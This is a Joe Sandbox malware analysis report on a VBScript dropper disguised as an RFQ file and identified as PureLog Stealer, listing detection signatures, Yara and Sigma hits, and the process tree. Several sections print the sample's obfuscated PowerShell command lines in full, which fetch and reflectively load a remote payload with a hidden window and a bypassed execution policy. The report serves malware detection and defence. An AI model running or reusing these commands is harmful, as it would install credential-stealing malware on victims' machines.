Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 2024.09.26-89 vivecta.vbs

Overview

General Information

Sample name:RFQ 2024.09.26-89 vivecta.vbs
Analysis ID:1520409
MD5:3cd94749b68b70e441c22d7b39b92baf
SHA1:1c81975dae77ea2b7118eef79b8885e0961e04d8
SHA256:eb32d01b3eeb25cf31b3cbe7a3ae26eb3e6b6aa1f1936bae80f3fd5b514220c3
Tags:vbsuser-abuse_ch
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5964 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1423540417.00000217ABD20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000006.00000002.1400827922.00000217A3CCD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      Process Memory Space: powershell.exe PID: 3740INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x627c:$b3: ::UTF8.GetString(
      • 0x216f3:$b3: ::UTF8.GetString(
      • 0x21d19:$b3: ::UTF8.GetString(
      • 0x22f01:$b3: ::UTF8.GetString(
      • 0x3fad9:$b3: ::UTF8.GetString(
      • 0x402a8:$b3: ::UTF8.GetString(
      • 0x408e2:$b3: ::UTF8.GetString(
      • 0x43c6d:$b3: ::UTF8.GetString(
      • 0x43d1a:$b3: ::UTF8.GetString(
      • 0x44317:$b3: ::UTF8.GetString(
      • 0x55be7:$b3: ::UTF8.GetString(
      • 0x56214:$b3: ::UTF8.GetString(
      • 0x56a27:$b3: ::UTF8.GetString(
      • 0x57218:$b3: ::UTF8.GetString(
      • 0xcad8b:$b3: ::UTF8.GetString(
      • 0xcb506:$b3: ::UTF8.GetString(
      • 0xcbfa0:$b3: ::UTF8.GetString(
      • 0xcc5cd:$b3: ::UTF8.GetString(
      • 0xccdac:$b3: ::UTF8.GetString(
      • 0xcd5a2:$b3: ::UTF8.GetString(
      • 0xcde3a:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 5220INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc51673:$b2: ::FromBase64String(
      • 0xc526b1:$b2: ::FromBase64String(
      • 0x33b53:$s1: -join
      • 0x342b3:$s1: -join
      • 0x944ffa:$s1: -join
      • 0x95227b:$s1: -join
      • 0x95573d:$s1: -join
      • 0x955dd7:$s1: -join
      • 0x9578d3:$s1: -join
      • 0x959b27:$s1: -join
      • 0x95a34e:$s1: -join
      • 0x95aba9:$s1: -join
      • 0x95b2e4:$s1: -join
      • 0x95b316:$s1: -join
      • 0x95b35e:$s1: -join
      • 0x95b37d:$s1: -join
      • 0x95bbce:$s1: -join
      • 0x95bd4a:$s1: -join
      • 0x95bdc2:$s1: -join
      • 0x95be55:$s1: -join
      • 0x95c0bb:$s1: -join

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.powershell.exe.217a44e1710.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        6.2.powershell.exe.217abd20000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          6.2.powershell.exe.217a44e1710.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            6.2.powershell.exe.217abd20000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpO
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2
              Sigma detected: PowerShell Base64 Encoded Invoke Keyword
              Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcr